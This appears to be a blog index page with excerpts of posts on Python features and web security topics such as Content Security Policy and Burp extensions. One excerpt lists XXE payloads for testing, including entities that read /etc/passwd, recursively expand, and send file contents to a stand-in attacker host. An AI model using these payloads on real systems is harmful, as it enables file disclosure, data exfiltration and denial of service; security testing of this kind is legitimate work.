Python List Comprehension

List comprehension is a concise way to create lists in Python. It is a syntactic construct that allows you to create a new list by specifying the elements you want to include using a single line of code. List comprehensions are powerful and unique to Python because they provide a more readable, efficient, and elegant … Read more

Python Magic Methods

What are python magic methods? In Python, magic methods are special methods that allow you to define how instances of your class behave when used with certain built-in Python functions or operators. These methods have a double underscore (__) before and after their names; hence they are also known as Dunder Methods. Here are some … Read more

Some XXE Payloads

Here are some common XXE payloads that can be used to test for XXE- <!DOCTYPE replace [<!ENTITY example “Hello World”>]> <!DOCTYPE replace [<!ENTITY example SYSTEM “file:///etc/passwd”>]> <!DOCTYPE replace [<!ENTITY example SYSTEM “ftp://username:password@ftp.example.com/file”>]> <!DOCTYPE replace [<!ENTITY example SYSTEM “http://example.com/file”>]> <!DOCTYPE replace [<!ENTITY example SYSTEM “http://attacker.com/?data=%file_contents;”>]> <!DOCTYPE replace [<!ENTITY example “Hello &example2;”><!ENTITY example2 “&example;&example;&example;”>]> These payloads are … Read more

Content Security Policy

Content Security Policy (CSP) is a security measure that helps protect web applications from various attacks, including Cross-Site Scripting (XSS) and data injection. CSP works by specifying a set of Content Security Rules that dictate what resources are allowed to load on a page. This can be used to whitelist trusted sources of content, or … Read more

Context Managers in Python

Python is a powerful and versatile programming language that offers many features to help developers write clean and efficient code. One of these features is the use of context managers. In this blog post, we will take a closer look at what context managers are and how they can be used to simplify and improve … Read more

Writing a Basic Burp Extension in Python

Burp Suite is a popular web security testing tool that helps you secure web applications by testing and validating vulnerabilities. It’s a comprehensive platform for performing security assessments on web applications, and its extensibility is one of its key features. Burp Suite extensions are add-ons that allow you to customize and extend the functionality of … Read more